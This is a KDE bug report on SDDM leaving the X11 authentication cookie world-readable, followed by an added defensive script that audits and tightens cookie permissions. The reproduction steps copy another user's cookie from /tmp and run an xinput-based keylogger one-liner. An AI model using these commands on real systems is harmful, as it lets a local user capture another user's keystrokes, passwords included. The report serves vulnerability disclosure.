https://bugs.kde.org/show_bug.cgi?id=363140
Bug ID: 363140
Summary: World-readable X11 Cookie, easy key logger
Product: www.kde.org
Version: unspecified
Platform: Archlinux Packages
OS: Linux
Status: UNCONFIRMED
Severity: normal
Priority: NOR
Component: general
Assignee: kde-...@kde.org
Reporter: davidl.rum...@gmail.com

After logging in as any user, you are able to get the X11 cookie and start a key logger. This has been tested on a F23 system with KDE / SDDM (with current patches) and an Arch Linux system with KDE / SDDM (plasma-desktop 5.6.4-1).

You are able to easily get the X11 cookie.

$ sha256sum .Xauthority
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8 .Xauthority
$ sha256sum /tmp/xauth-1000-_0
fcda4502b96b622e4b7a76bf0025731b596d8056b4471676e04241b6832798b8 /tmp/xauth-1000-_0

The cookie is world-readable; even if you change the permissions of the cookie, after a reboot the changes are gone.

$ ls -l /tmp/xauth-1000-_0
-rw-r--r--. 1 sm sm 60 24. Feb 14:04 /tmp/xauth-1000-_0

I have another user that I log in as via the text console; after that you just need to start the typical X11 keylogger.

$ cp /tmp/xauth-1000-_0 .Xauthority
$ export DISPLAY=:0
$ xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 xinput test

Reproducible: Always

Steps to Reproduce:
1. Log in via the text console as any user.
2. Copy the X11 cookie over to the .Xauthority file for the user you just logged into.
$ cp /tmp/xauth-1000-_0 .Xauthority
3. Start the typical X11 keylogger.
$ xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 xinput test

Actual Results:
After running the commands listed in the "Steps to Reproduce" section, all the keyboard pushes are printed to the text console.

Expected Results:
The X11 cookie should not be world-readable.
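
A defender-side check for the condition reported above, as an added example that is not part of the original bug report or of KDE/SDDM code. It assumes GNU find and stat and the /tmp/xauth-* file naming seen in the report; the function names audit_xauth and tighten_xauth are hypothetical.

```shell
#!/bin/sh
# Added example (not from the bug report): audit X11 cookie files for
# group/world read access. Assumes GNU find/stat and the xauth-* naming
# shown in the report; audit_xauth and tighten_xauth are hypothetical names.

# Print "<mode> <owner> <path>" for each xauth-* file in DIR (default /tmp)
# that group or others can read. Returns 1 if any is found, else 0.
audit_xauth() {
    dir=${1:-/tmp}
    found=$(find "$dir" -maxdepth 1 -type f -name 'xauth-*' \
                 \( -perm -040 -o -perm -004 \) 2>/dev/null)
    [ -z "$found" ] && return 0
    printf '%s\n' "$found" | while IFS= read -r f; do
        printf '%s %s\n' "$(stat -c '%a %U' "$f")" "$f"
    done
    return 1
}

# Stopgap: restrict the caller's own cookie files to 0600. The report notes
# the permissive mode returns after a reboot, so this must run every session.
tighten_xauth() {
    dir=${1:-/tmp}
    find "$dir" -maxdepth 1 -type f -name 'xauth-*' -user "$(id -u)" \
         \( -perm -040 -o -perm -004 \) -exec chmod 600 {} +
}
```

Sourcing this from a session start-up script and calling audit_xauth /tmp gives a per-login signal that the cookie is exposed again.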